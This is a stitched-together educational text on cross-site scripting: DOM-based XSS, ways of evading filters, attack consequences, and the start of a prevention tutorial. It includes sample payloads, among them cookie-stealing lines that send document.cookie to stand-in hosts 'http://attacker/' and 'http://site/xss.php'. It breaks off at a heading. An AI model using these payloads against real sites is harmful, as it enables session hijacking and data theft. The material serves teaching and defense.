XSS injections. XSS attacks: what they are and why they are dangerous

We all know what cross-site scripting is, right? It is a vulnerability in which an attacker sends malicious data (usually HTML containing Javascript code) that the application later returns, causing the Javascript code to be executed. Well, not quite! There is a type of XSS attack that does not fit this definition, at least not in its fundamental principles. XSS attacks, as defined above, are divided into instant (the malicious data is embedded in the page returned to the browser immediately after the request) and deferred (the malicious data is returned some time later). But there is a third type of XSS attack, which does not rely on sending malicious data to the server. Although this seems counterintuitive, there are two well-documented examples of such an attack. This article describes this third type: XSS through the DOM (DOM Based XSS). Nothing fundamentally new about the attack is presented here; rather, the contribution of this material is in highlighting the distinctive features of the attack, which are very important and interesting.

Developers and application users must understand the principles of an XSS attack via the DOM, because it poses a threat to web applications and differs from regular XSS. There are many web applications on the Internet that are vulnerable to XSS via the DOM and yet have been tested for XSS and declared “invulnerable” to this type of attack. Developers and site administrators should become familiar with techniques for detecting and protecting against XSS via the DOM, because these techniques differ from those used to deal with standard XSS vulnerabilities.

Introduction

The reader should be familiar with the basic principles of XSS attacks. XSS usually refers to instant and deferred cross-site scripting. With instant XSS, the malicious code (Javascript) is returned by the attacked server immediately, in the response to the HTTP request. Deferred XSS means that the malicious code is stored on the attacked system and can later be injected into an HTML page of the vulnerable system. As mentioned above, this classification assumes that the fundamental property of XSS is that malicious code is sent from a browser to a server and returned to the same browser (instant XSS) or to any other browser (deferred XSS). This article argues that this classification is wrong. The ability to carry out an XSS attack that does not rely on injecting code into the page returned by the server has a major impact on protection and detection techniques. The principles of such attacks are discussed in this article.

Example and comments

Before describing the simplest attack scenario, it is important to emphasize that the methods described here have already been publicly demonstrated several times. I do not claim that the methods below are described for the first time (although some of them differ from previously published materials).

A sign of a vulnerable site may be the presence of an HTML page that uses data from document.location, document.URL or document.referrer (or any other objects that can be influenced by an attacker) in an insecure way.

Note for readers unfamiliar with these Javascript objects: When Javascript code runs in a browser, it accesses several objects represented within the DOM (Document Object Model). The document object is the main one of these objects and provides access to most of the page's properties. This object contains many nested objects such as location, URL and referrer. They are controlled by the browser according to the browser's point of view (as will be seen below, this is quite significant). So, document.URL and document.location contain the URL of the page, or more precisely, what the browser means by URL. Please note that these objects are not taken from the body of the HTML page. The document object contains a body object containing the parsed HTML code of the page.

It is not difficult to find an HTML page containing Javascript code that parses a URL string (accessed via document.URL or document.location) and, according to its value, performs some actions on the client side. Below is an example of such code.

By analogy with a previously published example, consider the following HTML page (assume it is served at http://www.vulnerable.site/welcome.html):

<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>
<BR>
Welcome to our system…
</HTML>

Normally this page greets the user by the name passed in the URL. However, a request like this:

http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

would cause XSS. Let's look at why: the victim's browser, having received this link, sends an HTTP request to www.vulnerable.site and receives the aforementioned (static!) HTML page. The victim's browser then begins to parse this HTML. The DOM contains a document object with a URL property, and this property is populated with the URL of the current page while the DOM is being created. When the parser reaches the Javascript code, it executes it, which modifies the HTML of the displayed page. In this case, the code references document.URL, and since part of this string is written into the HTML during parsing and is immediately parsed in turn, the injected code (alert(...)) is executed in the context of the same page.
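The parsing step can be tried outside a browser. The following is a minimal sketch, assuming a stand-alone function (the name extractName is hypothetical) that repeats the page's own logic, with a plain string standing in for document.URL:

```javascript
// Stand-alone re-creation of the page's parsing logic.
// `url` stands in for document.URL; nothing here touches a real DOM.
function extractName(url) {
  const pos = url.indexOf("name=") + 5;
  return url.substring(pos, url.length);
}

// A benign link yields just the name.
const benignName = extractName("http://www.vulnerable.site/welcome.html?name=Joe");

// A hostile link yields markup, which the page would pass to document.write unchanged.
const hostileName = extractName(
  "http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>"
);

console.log(benignName);
console.log(hostileName);
```

Whatever follows "name=" is returned verbatim, so the page writes attacker-chosen markup into itself without the server ever embedding it.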

Notes:

1. Malicious code is not embedded in the HTML page (unlike other types of XSS).
2. This exploit works only if the browser does not modify the URL characters. Mozilla automatically encodes the '<' and '>' characters (as %3C and %3E respectively) in the nested document objects. If the URL was typed directly into the address bar, this browser is not vulnerable to the attack described in this example. However, if the attack does not require the '<' and '>' characters (in their original unencoded form), it can still be carried out. Microsoft Internet Explorer 6.0 does not encode '<' and '>' and is therefore vulnerable to the described attack without any restrictions. Since there are many attack scenarios that do not require '<' and '>', even Mozilla is not immune to this class of attack.

Methods for detecting and preventing vulnerabilities of this type

In the example above, the malicious code is still sent to the server (as part of the HTTP request), so the attack can be detected just like any other XSS attack. But an attacker can work around this.

Consider the following example:

http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie)</script>

Note the '#' symbol to the right of the file name. It tells the browser that everything after this character is a fragment and not part of the request. Microsoft Internet Explorer (6.0) and Mozilla do not send the fragment after the '#' character to the server, so for the server this request is equivalent to http://www.vulnerable.site/welcome.html, i.e. the server never even sees the malicious code. With this technique, the browser does not send the malicious payload to the server at all.
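A short sketch of this split, assuming two hypothetical helpers: partSentToServer models what reaches the server (everything before the first '#'), and extractNameFromUrl repeats the welcome page's parsing on the full URL as the browser sees it:

```javascript
// Models the part of a URL that a browser places in the HTTP request:
// everything before the first '#'.
function partSentToServer(url) {
  const hashIndex = url.indexOf("#");
  return hashIndex === -1 ? url : url.substring(0, hashIndex);
}

// Same naive parsing as the welcome page; `url` stands in for document.URL.
function extractNameFromUrl(url) {
  const pos = url.indexOf("name=") + 5;
  return url.substring(pos, url.length);
}

const fragmentLink =
  "http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie)</script>";

const seenByServer = partSentToServer(fragmentLink);
const writtenByPage = extractNameFromUrl(fragmentLink);

console.log(seenByServer);
console.log(writtenByPage);
```

The server-side view contains no trace of the payload, while the client-side code still extracts it in full.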

However, in some cases the payload cannot be hidden: in some published examples the malicious payload is part of the username in a URL like http://username@host/. In this case, the browser sends a request with an Authorization header containing the username (the malicious payload), so the malicious code does reach the server (Base64 encoded, hence an IDS/IPS must first decode this data to detect the attack). However, the server does not need to embed this payload in any of its HTML pages for the attack to succeed, whereas such embedding is a necessary condition for a standard XSS attack.

Obviously, in situations where the payload can be completely hidden, detection tools (IDS) and prevention tools (IPS, web application firewalls) cannot fully protect against this attack. Even if the payload has to be sent to the server, in many cases it can be transformed to avoid detection. For example, if some parameter is protected (for example, the name parameter in the example above), a small change in the attack script can produce the following result:

http://www.vulnerable.site/welcome.html?notname=<script>alert(document.cookie)</script>

A more stringent security policy would require that the name parameter be sent. In this case, you can make the following request:

http://www.vulnerable.site/welcome.html?notname=<script>alert(document.cookie)</script>&name=Joe

If your security policy restricts additional parameter names (for example: foobar), you can use the following option:

http://www.vulnerable.site/welcome.html?foobar=name=<script>alert(document.cookie)</script>&name=Joe

Please note that the ignored parameter (foobar) must come first and contain a payload in its value.
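Why the ordering matters can be seen by running the page's parsing logic on such a URL. This is a sketch in which readNameNaively is a hypothetical stand-alone copy of that logic and the URL string stands in for document.URL:

```javascript
// Stand-alone copy of the welcome page's parsing; `url` stands in for document.URL.
function readNameNaively(url) {
  // indexOf returns the FIRST occurrence of "name=", wherever it appears.
  const pos = url.indexOf("name=") + 5;
  return url.substring(pos, url.length);
}

const disguisedLink =
  "http://www.vulnerable.site/welcome.html?foobar=name=<script>alert(document.cookie)</script>&name=Joe";

const writtenToPage = readNameNaively(disguisedLink);
console.log(writtenToPage);
```

The first "name=" is found inside the value of foobar, so the payload is written to the page while the genuine name parameter still carries an innocent value for any server-side filter to inspect.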

One previously published attack scenario is even more convenient for the attacker, since the full value of document.location is written into the HTML page (the Javascript code does not search for a specific parameter name). Thus, an attacker could completely hide the payload by sending the following:

/attachment.cgi?id=&action=foobar#<script>alert(document.cookie)</script>

Even if the payload is inspected by the server, protection can only be guaranteed if the request is rejected or the response is replaced with some error text. Referring again to the username example: if the Authorization header is simply removed by an intermediate security system, this has no effect as long as the original page is still returned. Likewise, any attempt to sanitize the data on the server by removing or encoding illegal characters is ineffective against this attack.

In the case of document.referrer, the payload is sent to the server via the Referer header. However, if the user's browser or intermediate protection removes this header, there will be no trace of the attack, which can go completely undetected.

To summarize, the traditional methods, namely

1. Server-side HTML encoding of output data
2. Server-side removal/encoding of prohibited input

do not work against DOM XSS.

Automatically searching for vulnerabilities by “bombarding” the application with malicious data (sometimes called fuzzing) will not work, since programs using this technique typically draw their conclusions from whether the injected data is present in the returned page (instead of executing the code in the context of a browser on the client side and observing the results). However, if the program can statically analyze the Javascript code found on the page, it may point out suspicious signs (see below). And of course, if security tools can execute Javascript code (and correctly initialize the DOM objects) or emulate such execution, they will be able to detect this attack.

Manually searching for a vulnerability using a browser will also work, since the browser can execute client-side Javascript code. Vulnerability scanners can adopt this method and run the client-side code to monitor the results of its execution.

Effective protection

1. Avoid client-side document rewrites, redirects, or other similar actions that use client-side data. Most of these actions can be performed by dynamic pages (on the server side).

2. Analyze and harden the client-side (Javascript) code. References to DOM objects that can be influenced by the user (the attacker) must be carefully checked. Particular attention should be paid to the following objects (among others):
* document.URL
* document.URLUnencoded
* document.location (and its properties)
* document.referrer
* window.location (and its properties)

Note that the properties of the document and window objects can be referenced in several ways: explicitly (example: window.location), implicitly (example: location), or by obtaining a handle and using it (example: handle_to_some_window.location).

Particular attention should be paid to code where the DOM is modified, either explicitly or potentially, through direct access to HTML or through access directly to the DOM. Examples (this is by no means an exhaustive list):
* Writing raw HTML into the page:
o document.write(…)
o document.writeln(…)
o document.body.innerHTML=…
* Changing DOM directly (including DHTML events):
o document.forms.action=… (and other variations)
o document.attachEvent(…)
o document.create…(…)
o document.execCommand(…)
o document.body. ... (accessing the DOM via the body object)
o window.attachEvent(…)
* Changing document URL:
o document.location=… (as well as assigning href, host and hostname values to the location object)
o document.location.hostname=…
o document.location.replace(…)
o document.location.assign(…)
o document.URL=…
o window.navigate(…)
* Opening/modifying the window object:
o document.open(…)
o window.open(…)
o window.location.href=… (as well as assigning the host and hostname values to the location object)
* Executing the script directly:
o eval(…)
o window.execScript(…)
o window.setInterval(…)
o window.setTimeout(…)
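The kind of static check mentioned earlier can be sketched as a line-by-line pattern match. This is only an illustration under loud assumptions: the two pattern lists are a small, incomplete subset of the objects and calls listed above, the function name flagSuspiciousLines is hypothetical, and a real analyzer would need to parse the code and track data flow rather than match text:

```javascript
// Illustrative, incomplete patterns taken from the lists above.
const SOURCE_PATTERN =
  /\b(document\.(URLUnencoded|URL|location|referrer)|window\.location)\b/;
const SINK_PATTERN =
  /(document\.write(ln)?\s*\(|\.innerHTML\s*=|\beval\s*\(|\bsetTimeout\s*\(|\bsetInterval\s*\(|\bexecScript\s*\()/;

// Returns one entry per line that mentions an attacker-influenced object
// (a "source") or a call that writes or executes code (a "sink").
function flagSuspiciousLines(sourceCode) {
  const findings = [];
  sourceCode.split("\n").forEach((text, index) => {
    const usesSource = SOURCE_PATTERN.test(text);
    const usesSink = SINK_PATTERN.test(text);
    if (usesSource || usesSink) {
      findings.push({ line: index + 1, usesSource, usesSink });
    }
  });
  return findings;
}

const sampleScript = [
  'var pos = document.URL.indexOf("name=") + 5;',
  "var greeting = 'Hi';",
  "document.write(document.URL.substring(pos, document.URL.length));",
].join("\n");

const report = flagSuspiciousLines(sampleScript);
console.log(report);
```

A line that combines a source with a sink, like the last line of the sample, is the strongest hint that the code deserves manual review.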

Everyone has long known what XSS is and how to protect against it, so I’ll be brief. XSS is the ability of an attacker to inject, in one way or another (for the possible options, see the link at the end of the article), a script into a page of the victim site, which will be executed when the page is visited.

Interestingly, in most descriptions of this vulnerability, we are frightened with the following code:

http://www.site.com/page.php?var=<script>alert("xss");</script>

Somehow it’s not very scary :) How can this vulnerability really be dangerous?

Passive and active

There are two types of XSS vulnerabilities - passive and active.

An active vulnerability is more dangerous, since the attacker does not need to lure the victim with a special link; he just needs to inject the code into the database or into some file on the server. Thus, all site visitors automatically become victims. The code can be injected, for example, using SQL injection. Therefore, you should not trust the data stored in the database, even if it was processed during insertion.

An example of a passive vulnerability can be seen at the very beginning of the article. It requires social engineering, for example, an important letter from the site administration asking you to check your account settings after a restore from backup. Accordingly, the attacker needs to know the victim’s address, or simply arrange a spam mailing or post on some forum, and there is no guarantee that the victims will be naive enough to follow the link.

Moreover, both POST and GET parameters can be susceptible to a passive vulnerability. With POST parameters, of course, the attacker has to resort to tricks, for example a redirect through the attacker’s own website: a page there contains a form addressed to the vulnerable site, and a script submits it automatically.

document.getElementsByTagName("form")[0].submit();

Therefore, a GET vulnerability is a little more dangerous, because it is easier for a victim to notice an incorrect domain than an additional parameter (although the URL can also be encoded).

Stealing Cookies

This is the most commonly cited example of an XSS attack. Websites sometimes store valuable information in cookies (sometimes even the user’s login and password, or its hash), but the most dangerous thing is the theft of an active session, so do not forget to click the “Log out” link on websites, even on your home computer. Fortunately, on most resources the session lifetime is limited.

var img = new Image(); img.src = "http://site/xss.php?" + document.cookie;

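That is why domain restrictions were introduced for XMLHttpRequest, but this is not a problem for an attacker, since cross-domain requests can still be made through HTML elements that load external resources (such as the image above), background:url(); etc.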

Stealing data from forms

The attacker's script finds the form, for example via getElementById, and hooks the onsubmit event. From then on, before the form is submitted, the entered data is also sent to the attacker’s server.

This type of attack is somewhat reminiscent of phishing, only it uses a real site rather than a fake one, which instills more trust in the victim.

DDoS attack (distributed denial of service attack)

An XSS vulnerability on heavily visited resources can be used to launch a DDoS attack. The essence is simple: the attacked server receives more requests than it can withstand.
Strictly speaking, the relation to XSS is indirect, since scripts may not be needed at all: an HTML element that loads a resource from the attacked server is enough.

Cross-Site Request Forgery (CSRF/XSRF)

This is also only indirectly related to XSS. It is actually a separate type of vulnerability, but it is often used in conjunction with XSS. The bottom line is that a user who is logged in to a site that is not itself vulnerable visits a vulnerable site (or a specially prepared page of the attacker), from which a request is sent to perform certain actions on the first site.

Roughly speaking, the ideal scenario looks like this. The user logs in to a payment system. Then he visits the attacker’s website, or a site with an XSS vulnerability, from which a request is sent to transfer money to the attacker’s account.

Therefore, most sites, when performing certain user actions (for example, changing e-mail), ask for a password or ask you to enter a confirmation code.

XSS worms

This type of attack probably appeared thanks to social networks such as VKontakte and Twitter. The point is that a link exploiting an XSS vulnerability is sent to several users of the social network; when they click the link, the injected script sends messages to other users on their behalf, and so on. At the same time, other actions can be performed, for example, sending the victims' personal data to the attacker.

Harmless XSS

Interestingly, visitor counters are, by their very nature, also a kind of active XSS attack. After all, data about the visitor, such as his IP address, monitor resolution, etc., is transferred to a third-party server. The only difference is that you embed the code into your page of your own free will :) Take a look, for example, at the Google Analytics code.

What follows is a comprehensive tutorial on cross-site scripting.

Part One: Overview

What is XSS?

Cross-site scripting (XSS) is a code injection attack that allows an attacker to execute malicious JavaScript in another user's browser.

The attacker does not attack the victim directly. Instead, he exploits a vulnerability in a website that the victim visits and gets the website to deliver the malicious JavaScript for him. In the victim's browser, the malicious JavaScript appears to be a legitimate part of the website, and the website itself acts as an unwitting accomplice of the attacker.

Injection of malicious JavaScript code

The only way for an attacker to run malicious JavaScript in a victim's browser is to inject it into one of the pages that the victim loads from the website. This is possible if the website includes user input in its pages, because the attacker can then insert a string that the victim's browser will treat as code.

The example below shows a simple server-side script that is used to display the latest comment on a site:

print "<html>"
print "Last comment:"
print database.latestComment
print "</html>"

The script assumes that the comment consists of text only. However, since user input is included directly, an attacker could leave this comment: "<script>...</script>". Any user visiting the page will now receive the following response:

<html>
Last comment:
<script>...</script>
</html>

When the user's browser loads the page, it will execute everything, including the JavaScript code contained inside the <script> tags. The attacker has successfully carried out the attack.
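The same server-side script can be sketched in JavaScript to show exactly what the response contains. The function name renderLatestComment is hypothetical, and its argument stands in for database.latestComment:

```javascript
// Mirrors the pseudocode above: the stored comment is placed into the page as is.
// `latestComment` stands in for database.latestComment.
function renderLatestComment(latestComment) {
  return ["<html>", "Last comment:", latestComment, "</html>"].join("\n");
}

// A text-only comment produces a harmless page.
const harmlessPage = renderLatestComment("Nice article!");

// A comment containing markup becomes part of the page's HTML.
const injectedPage = renderLatestComment("<script>...</script>");

console.log(harmlessPage);
console.log(injectedPage);
```

Nothing in the script distinguishes text from markup, so whatever the attacker stored is delivered to every visitor as part of the page.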

What is malicious JavaScript?

The ability to execute JavaScript in the victim's browser may not seem particularly malicious. JavaScript runs in a very restricted environment that has extremely limited access to the user's files and operating system. In fact, you can open the JavaScript console in your browser right now and execute any JavaScript you want, and it is very unlikely that you will be able to cause any harm to your computer.

However, the potential for JavaScript code to act as malicious code becomes clearer when you consider the following facts:

JavaScript has access to some of the user's confidential information, for example cookies.
JavaScript can send HTTP requests with arbitrary content to arbitrary destinations using XMLHttpRequest and other mechanisms.
JavaScript can make arbitrary changes to the HTML of the current page using DOM manipulation techniques.

Combined, these facts can lead to very serious security breaches, as detailed below.

Consequences of malicious JavaScript code

Among other things, the ability to execute arbitrary JavaScript in another user's browser allows an attacker to carry out the following types of attacks:

Cookie theft

An attacker can access the victim's cookies for the website using document.cookie, send them to his own server and use them to extract sensitive information such as session IDs.

Keylogger

An attacker can register a keyboard event listener using addEventListener and then send all of the user's keystrokes to his own server, potentially recording sensitive information such as passwords and credit card numbers.

Phishing

An attacker can insert a fake login form into the page using DOM manipulation, set the form's action attribute to point at his own server, and then trick the user into submitting sensitive information.

Although these attacks differ significantly, they all have one significant thing in common: since the attacker injects code into a page served by the website, the malicious JavaScript is executed in the context of that website. This means that it is treated like any other script from that site: it has access to the victim's data for that website (such as cookies), and the hostname displayed in the URL bar is that of the website. For all intents and purposes, the script is considered a legitimate part of the website, which allows it to do anything that the website itself can do.

This fact highlights a key issue:

If an attacker can use your website to execute arbitrary JavaScript code in other users' browsers, the security of your website and its users is compromised.

To emphasize this point, some of the malicious scripts in this tutorial are left without detail and written as "...". This indicates that the mere presence of a script injected by an attacker is the problem, regardless of what specific code the script actually executes.

Part two: XSS attack

Participants in the XSS attack

Before we describe in detail how an XSS attack works, we need to define the actors involved. In general, there are three parties to an XSS attack: the website, the victim, and the attacker.

The website provides HTML pages to the users who request them. In our examples it is located at http://website/.
- The website's database is a database that stores some of the data entered by users on the pages of the site.
The victim is a regular user of the website who requests pages from it using his browser.
The attacker is a malicious user who intends to launch an attack on the victim by exploiting an XSS vulnerability in the website.
- The attacker's server is a web server controlled by the attacker for the sole purpose of stealing the victim's confidential information. In our examples, it is located at http://attacker/.

Example attack scenario

In this example, the attacker's goal is to steal the victim's cookies by exploiting an XSS vulnerability in the website. This can be done by getting the victim's browser to parse the following HTML code:

<script>window.location="http://attacker/?cookie="+document.cookie</script>

This script redirects the user's browser to another URL, which triggers an HTTP request to the attacker's server. The URL includes the victim's cookies as a request parameter, so when the HTTP request reaches the attacker's server, the attacker can extract the cookies from it. Once the attacker has the cookies, he can use them to impersonate the victim and launch further attacks.

From now on, the HTML code shown above will be called a malicious string or malicious script. It is important to understand that the string itself is only malicious if it is ultimately rendered as HTML in the victim's browser, and this can only happen if there is an XSS vulnerability in the website.

How this example attack works

The steps below show how the attacker carries out this example attack:

1. The attacker uses one of the website's forms to insert a malicious string into the website's database.

2. The victim requests a page from the website.

3. The website includes the malicious string from the database in the response and sends it to the victim.

4. The victim's browser executes the malicious script inside the response, sending the victim's cookies to the attacker's server.

XSS Types

The goal of an XSS attack is always to execute malicious JavaScript in the victim's browser. There are several fundamentally different ways to achieve this goal. XSS attacks are often divided into three types:

Stored (persistent) XSS, where the malicious string originates from the website's database.
Reflected (non-persistent) XSS, where the malicious string originates from the victim's request.
DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.

The previous example shows a stored XSS attack. We will now describe the two other types of XSS attacks: reflected XSS and DOM-based XSS.

Reflected XSS

In a reflected XSS attack, the malicious string is part of the victim's request to the website. The site accepts this malicious string and inserts it into the response sent back to the user. The steps below illustrate this scenario:

1. The attacker crafts a URL containing a malicious string and sends it to the victim.

2. The attacker tricks the victim into requesting this URL from the website.

3. The website includes the malicious string from the URL in its response to the victim.

4. The victim's browser executes the malicious script contained in the response, sending the victim's cookies to the attacker's server.
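The reflection step can be sketched as a server-side function that builds a page from the requested URL. Everything named here is an assumption for illustration: the renderSearchPage function, the /search path and the keyword parameter do not come from the original text:

```javascript
// Hypothetical handler: builds a results page from the requested URL
// and echoes the "keyword" parameter back without any encoding.
function renderSearchPage(requestUrl) {
  const keyword = new URL(requestUrl).searchParams.get("keyword") || "";
  return "<html>You searched for: " + keyword + "</html>";
}

// The attacker prepares the link; percent-encoding keeps it a valid URL.
const craftedUrl =
  "http://website/search?keyword=" + encodeURIComponent("<script>...</script>");

// The victim's request makes the website reflect the string into its response.
const reflectedResponse = renderSearchPage(craftedUrl);

console.log(craftedUrl);
console.log(reflectedResponse);
```

The website decodes the parameter and places it in the response unchanged, so the malicious string arrives in the victim's browser as part of the site's own page.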

How to successfully carry out a reflected XSS attack?

A reflected XSS attack may seem harmless because it requires the victim himself to send a request that contains the malicious string. Since no one would voluntarily attack himself, there seems to be no way to actually carry out the attack.

As it turns out, there are at least two common ways to get a victim to launch a reflected XSS attack against himself:

If the target is a specific individual, the attacker can send the malicious URL to the victim (for example, by email or messenger) and trick him into opening it.
If the target is a large group of users, the attacker can publish a link to the malicious URL (for example, on his own website or on a social network) and wait for visitors to follow it.

These two methods are similar, and both can be made more successful by using a URL shortening service, which hides the malicious string from users who might otherwise recognize it.

XSS in the DOM

XSS in the DOM is a variant of both stored and reflected XSS attacks. In this attack, the malicious string is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. The steps below illustrate this scenario for a reflected XSS attack:

1. The attacker crafts a URL containing a malicious string and sends it to the victim.

2. The attacker tricks the victim into requesting this URL from the website.

3. The website receives the request, but does not include the malicious string in the response.

4. The victim's browser executes the legitimate script contained in the response, causing the malicious script to be inserted into the page.

5. The victim's browser executes the malicious script inserted into the page, sending the victim's cookies to the attacker's server.

What makes XSS in the DOM different?

In previous examples of stored and reflected XSS attacks, the server inserts a malicious script into a page, which is then forwarded in a response to the victim. When the victim's browser receives the response, it assumes that the malicious script is part of the page's legitimate content and automatically executes it while the page is loading, just like any other script.

In the example of an XSS attack in the DOM, no malicious script is inserted as part of the page; the only script that is automatically executed when the page loads is a legitimate part of the page. The problem is that this legitimate script directly uses user input to add HTML to the page. Since the malicious string is inserted into the page using innerHTML, it is parsed as HTML, causing the malicious script to be executed.

This difference is small, but very important:

In traditional XSS, the malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.
In the case of XSS in the DOM, the malicious JavaScript is executed at some point after the page has loaded, as a result of the page's legitimate JavaScript treating user input (containing the malicious string) in an insecure manner.

How does XSS work in the DOM?

There is no need for JavaScript in the previous example; the server can generate all the HTML by itself. If the server-side code did not contain vulnerabilities, the website would not be susceptible to an XSS vulnerability.

However, as web applications become more advanced, more and more HTML is generated by JavaScript on the client side rather than on the server. Whenever content needs to change without refreshing the entire page, the update has to be performed with JavaScript. In particular, this is the case when a page is updated after an AJAX request.

This means that XSS vulnerabilities can be present not only in the server-side code of your site, but also in its client-side JavaScript code. Therefore, even with completely secure server-side code, the client-side code may still include user input unsafely when updating the DOM after the page has loaded. If this happens, the client-side code will allow an XSS attack to occur through no fault of the server-side code.
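One way client-side code can include user input safely is to assign it to a text-only property instead of an HTML-parsing one. The sketch below assumes a hypothetical showGreeting function; so that it also runs outside a browser, a plain object stands in for a DOM element, whereas in a real page `element` would be a DOM node:

```javascript
// `element` is any object exposing the standard textContent property;
// in a browser it would be a real DOM node.
function showGreeting(element, userName) {
  // textContent stores the value as plain text, so a browser never parses it as HTML.
  // Assigning the same string to innerHTML would have it parsed as markup.
  element.textContent = "Hi " + userName;
}

// Plain object used as a stand-in so the sketch runs without a DOM.
const fakeElement = {};
showGreeting(fakeElement, "<script>...</script>");

console.log(fakeElement.textContent);
```

The malicious string is still displayed, but only as visible text: it never passes through the HTML parser.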

DOM-based XSS may not be visible to the server

There is a special case of an XSS attack in the DOM in which the malicious string is never sent to the website's server: this occurs when the malicious string is contained in the fragment identifier of the URL (everything after the # symbol). Browsers do not send this part of the URL to the server, so the website cannot access it from server-side code. Client-side code, however, does have access to it, and so an XSS attack is possible if that code handles it insecurely.

This case is not limited to the fragment identifier. There is other user input that is invisible to the server, for example data kept in newer HTML5 features such as LocalStorage and IndexedDB.

Part three: XSS prevention

XSS prevention techniques

Recall that XSS is a code injection attack: user input is mistakenly interpreted as program code. To prevent this type of code injection, secure input handling is required. For a web developer, there are two fundamentally different ways to perform secure input handling:

Encoding is a method that escapes user input so that the browser interprets it only as data, not as code.
Validation is a method that filters user input so that the browser interprets it as code without malicious commands.
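The two approaches can be illustrated with a pair of small functions. This is a minimal sketch, not a complete defense: encodeHtml and isAllowedLink are hypothetical names, the first covers only the HTML element and attribute contexts, and the second is just one example of validation (allowing only http and https links):

```javascript
// Encoding: replace characters that are significant in HTML with entities,
// so the browser treats the input as data.
function encodeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Validation: accept a user-supplied link only if it is an absolute
// http or https URL; everything else is rejected.
function isAllowedLink(value) {
  try {
    const protocol = new URL(value).protocol;
    return protocol === "http:" || protocol === "https:";
  } catch (error) {
    return false; // not an absolute URL at all
  }
}

const encodedComment = encodeHtml("<script>...</script>");
const goodLink = isAllowedLink("http://website/");
const scriptLink = isAllowedLink("javascript:alert(1)");

console.log(encodedComment, goodLink, scriptLink);
```

Encoding keeps the input but neutralizes it, while validation decides whether the input may be used at all.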

Although these are fundamentally different XSS mitigation methods, they have several common features that are important to understand when using either one:

Context

Secure input handling must be done differently depending on where on the page the user input is used.

Inbound/outbound

Secure input handling can be done either when your site receives the input (inbound) or right before the site inserts the user input into the page content (outbound).

Client/server

Secure input handling can be done either on the client side or on the server side; each option is needed under different circumstances.

Before explaining in detail how encoding and validation work, we will describe each of these points.

Handling user input in contexts

There are many contexts on a web page where user input can be applied. For each of them, special rules must be followed to ensure that user input cannot escape its context and cannot be interpreted as malicious code. The following are the most common contexts:

Why do contexts matter?

In all of the described contexts, an XSS vulnerability could arise if user input were inserted without first being encoded or validated. An attacker can then inject malicious code simply by inserting the closing delimiter for that context followed by the malicious code.

For example, if at some point the website inserts user input directly into an HTML attribute, an attacker would be able to inject a malicious script by starting his input with a quote.

This could be prevented by simply removing all the quotes from the user input, and everything would be fine, but only in this context. If the same input were inserted into a different context, the closing delimiter would be different and injection would again be possible. For this reason, secure input handling must always be tailored to the context in which the user input will be inserted.
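The attribute case can be made concrete with a short sketch. The function names and the input element are assumptions chosen for illustration; the malicious script itself is left as "...":

```javascript
// Inserts user input into an HTML attribute value without any processing.
function renderField(userInput) {
  return '<input value="' + userInput + '">';
}

// Context-specific fix from the text: remove every double quote.
function stripQuotes(userInput) {
  return userInput.replace(/"/g, "");
}

// A different context: user input placed as HTML element content.
function renderParagraph(userInput) {
  return "<p>" + userInput + "</p>";
}

// The leading quote closes the attribute, the '>' closes the tag.
const attributeAttack = '"><script>...</script><input value="';
const brokenField = renderField(attributeAttack);

// Without quotes the input can no longer leave the attribute value...
const containedField = renderField(stripQuotes(attributeAttack));

// ...but the same filter does nothing for element content.
const brokenParagraph = renderParagraph(stripQuotes("<script>...</script>"));

console.log(brokenField);
console.log(containedField);
console.log(brokenParagraph);
```

In the first result the script element sits between two complete input tags; in the second the whole string stays inside the quoted value; in the third the quote filter has no effect because no quote was needed to break out.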

Handling incoming/outgoing user input

Instinctively, it would seem that XSS could be prevented by encoding or validating all user input as soon as our site receives it. This way, any malicious strings will already be neutralized whenever they are included in the page, and HTML generation scripts won't have to worry about handling user input safely.

The problem is that, as described earlier, user input can be inserted into several contexts on a page. There is no simple way to determine, at the moment user input arrives, which context it will eventually be inserted into, and the same user input often needs to be inserted into different contexts. By relying on inbound input handling to prevent XSS, we create a very brittle solution that is prone to errors. (PHP's deprecated "magic quotes" feature is an example of such a solution.)

Instead, outbound input handling should be your primary line of defense against XSS, because it can take into account the specific context into which the user input will be inserted. To some extent, inbound validation can be used to add a secondary layer of protection, but more on that later.

Where is it possible to handle user input securely?

In most modern web applications, user input is processed both on the server side and on the client side. To protect against all types of XSS, secure input handling must be done in both server-side and client-side code.

To protect against traditional XSS, secure input handling must be done in server-side code. This is done using some language supported by the server.
To protect against DOM-based XSS, where the server never receives the malicious string (such as the fragment identifier attack described earlier), secure input handling must be done in client-side code. This is done using JavaScript.

Now that we've explained why context matters, why the distinction between inbound and outbound input handling is important, and why secure input handling must be done on both the client side and the server side, we can go on to explain how the two types of secure input handling (encoding and validation) are actually performed.

Encoding

Encoding is the act of escaping user input so that the browser interprets it only as data, not as code. The most widely known type of encoding in web development is HTML escaping, which converts characters such as < and > into &lt; and &gt; respectively.

The following pseudocode is an example of how user input could be encoded using HTML escaping and then inserted into a page by a server-side script:

print ""
print "Last comment: "
print encodeHtml(userInput)
print ""

If the user enters the following line..., the resulting HTML will look like this:

Last comment:
...

Because all characters with special meaning have been escaped, the browser will not parse any part of the user input as HTML.
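The pseudocode leaves encodeHtml undefined. One possible way to write such a helper in JavaScript is sketched below; the implementation and the sample comment are assumptions for illustration, and in practice a well-tested templating library would normally do this for you:

```javascript
// Hypothetical implementation of the encodeHtml helper named in the pseudocode.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function encodeHtml(input) {
  // Replace every character that is significant in HTML with a character reference.
  return String(input).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

const comment = "<script>alert('hi')</script>";
console.log("Last comment: " + encodeHtml(comment));
```

The ampersand is escaped along with the angle brackets and quotes, so input that already contains character references is shown literally instead of being decoded by the browser.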

Encoding in client-side and server-side code

